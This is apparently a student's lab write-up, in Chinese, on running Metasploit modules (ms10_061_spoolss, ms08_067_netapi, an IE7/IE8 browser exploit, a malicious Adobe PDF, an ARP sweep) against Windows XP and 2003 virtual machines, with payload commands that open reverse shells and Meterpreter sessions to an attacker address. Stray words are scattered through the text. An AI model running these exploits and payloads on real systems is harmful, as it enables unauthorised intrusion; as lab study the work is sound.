這幾個實驗我發現就是在使用exploit攻擊模塊中不一樣的攻擊方法進行攻擊,並且流程基本都同樣。先使用search exploit/windows/smb/ms
找到windows中的漏洞,而後看看其簡單的描述,選中其中一個使用info xxx
查看其信息,主要看其可攻擊targets、描述、必須設置的參數。接下來設置payload,同時設置payload的參數,全部的參數都設置完畢以後就能夠進行exploit攻擊了!總的來講就是在使用metaspolit這個軟件提供的攻擊服務!!shell
在完成老師安排的任務以外,我還嘗試了:數據庫
ms06_066_nwapi
只差一步可惡!windows
下面這個是成功的!!!api
use exploit/windows/smb/ms10_061_spoolss
進入攻擊模塊瀏覽器
info
查看
等級Excellent,發佈時間2010-09-14安全
目標機器:全部的windows平臺網絡
須要設置參數:目標地址和端口,可選:目標共享打印機名
描述:打印機漏洞session
被進攻的機器爲Windows xp中文版
其中xp中要有共享打印機,具體作法tcp
一、在控制面板中的---打印機和傳真---下有默認的Microsoft打印機,但好像並很差用(能夠嘗試下直接改屬性---端口爲COM1試試)。 二、VMware提供虛擬打印機,在com1口。 三、刪掉了默認的打印機(自願),而後,添加打印機---鏈接到次計算機的本地打印機(去掉勾選的自動檢測)---COM1口(VMware中查看便可)---打印機廠商默認便可---打印機名---共享---位置隨意可不填 四、重啓print Spooler服務(不重啓可能致使meta鏈接打印機失敗)
回到Linux中,設置相關參數後(要注意:set PNAME 爲目標打印機name),exploit攻擊成功!
測試
要攻擊一個有漏洞的主機簡直不過太簡單了!!!我感受修復一個漏洞所須要的時間尚未使用這個漏洞拿來攻擊所花費的時間長!!之後有補丁真的立刻安裝,我不再敢拖了。真的懼怕!
輸入命令use exploit/windows/smb/ms08_067_netapi,info
瞭解該漏洞模塊的使用。
windows平臺,等級great,補丁發佈時間2008-10-28
可攻擊的目標:windows 2003
須要設置的參數目標地址(RHOST)、目標端口(RPORT)、使用管道(SMBPIPE)
描述如上
輸入命令show payloads
會顯示出有效的攻擊載荷,以下圖所示,咱們找到一個shell_reverse_tcp。
使用命令set payload generic/shell_reverse_tcp設置攻擊有效載荷。
根據show options
中必須設置的東西進行設置
輸入命令exploit開始攻擊,垂手可得的正常攻擊成功
中途我對老師給的中文版的windows xp進行攻擊,覺得成功了,沒想到看了同窗的博客發現是白開心一場
同上述步驟,第一步,查找相關漏洞信息
平臺winodows,等級Normal,補丁發佈時間2011-06-16
可攻擊的目標:XP或Vista的IE7和IE8
必須的參數:反彈地址(SRVHOST)、反彈端口(SRVPORT)
描述
使用show payloads
指令查看可使用的負載
加載payload
set payload windows/meterpreter/reverese_http
設置相應參數,經過show options查看
set URIPATH ms5320 //設置訪問主頁的URI set LHOST 192.168.47.130 //設置攻擊IP set LPORT 8888 //設置攻擊端口
打開服務exploit,發起滲透攻擊
此時,在靶機中啓動IE 7瀏覽器,訪問連接:http://192.168.47.130:8080/ms5320;
與此同時,在攻擊機的MSF終端中,能夠看到以下信息:
輸入sessions
能夠看見正在監聽端的活動會話
發現1端口正在監聽,使用session -i 1
接入ID號爲1的當前靶機回連的會話
攻擊成功!
這個滲透攻擊模塊的路徑爲windows/fileformat/adobe_cooltype_sing
,使用info
查看該模塊的內容
能夠看到這個漏洞是存在於8.2.4和9.3.4版本的Adobe Reader中,於2010-09-07發佈的補丁,等級是Great。
咱們進入該模塊設定相關係數並生成相關文件5320.pdf
將生成的pdf文件導入到windows XP Attacker靶機中運行,回連成功!
這個這個pdf的內容,內容並不可疑!
先手動建立一個msf所需的數據庫
輸入命令 use auxiliary/scanner/discovery/arp_sweep進入模塊
show options查看須要設置的消息,其中rhosts填寫本身電腦所在網段
設置必要參數
set RHOSTS 172.30.1.0/21
set threads 2
命令run開啓掃描,結果能夠看到除了本身主機的IP,還有其餘ip